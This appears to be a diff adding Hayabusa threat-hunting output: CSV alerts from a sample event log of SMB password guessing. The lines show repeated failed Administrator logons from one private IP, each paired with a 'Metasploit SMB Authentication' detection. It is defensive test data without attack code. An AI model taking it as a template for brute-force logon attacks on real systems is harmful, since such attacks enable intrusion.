+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5St1kWrKP4PZlOIy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17A6k4Om84gunQfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9GfR4XdixrNJHny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 27JWPfEV4DgS1tNv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yNeJnXg1pyedSpqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WWihv14n9IAQXw2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gy19bFWzQFaQZRBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N28Ec4jkXkSNvsQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sD9qQWJbeukyPQbc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uoRSHXvwMeKg8cyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPEOhloL7vo1fTFQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: glbLglffka5JqQCN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7MTbgvYN6PIaKxeK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAjWfgmGrm3o2mAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9EZYPG6uQtsez1UI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PRcnsdLAKd7enemG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUZEQaUavv7fWk4w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JKth56VEMqMCgwG9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TCGlvOFFkVpSHSoM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmLxSIastsvqdJC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPyvUDHHWzbhyvZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7dF4fIlAvIBYiw0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPDPtH2m9TgW8Khg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AChGHCNom0ds5ujV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8sLQI4KGgQRq2Sy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dqeLFLRT5EXiCBUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dx3tco9up7XnOa7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZdNX4ubtpQaV9EeF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S05I0ZlGKGazkVkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzbfrYSYhxH6WcCt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGTvXs8Mlc0Fi7iT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1LjtTFjPfPlBqAi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lhJW3iO1xGGTMhp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMz7WmlBTgadVgN8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OB02epCA5pc5oBeJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KAFgReUMtu9VerRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ByeL26yQfohpQT3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 527r3nh9ocmItXfL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNeC1BBFVXv839Ys  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: juXXpQcoPfJLMQ3L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: njNdv4lGnsUpooCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j6VchLhWJT7cCWVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r3xxnFpbd8zkFm0h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtf156NEpOebQHGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17O1jfGX6KQMPgnD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NaqTqrCiPPfNxZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
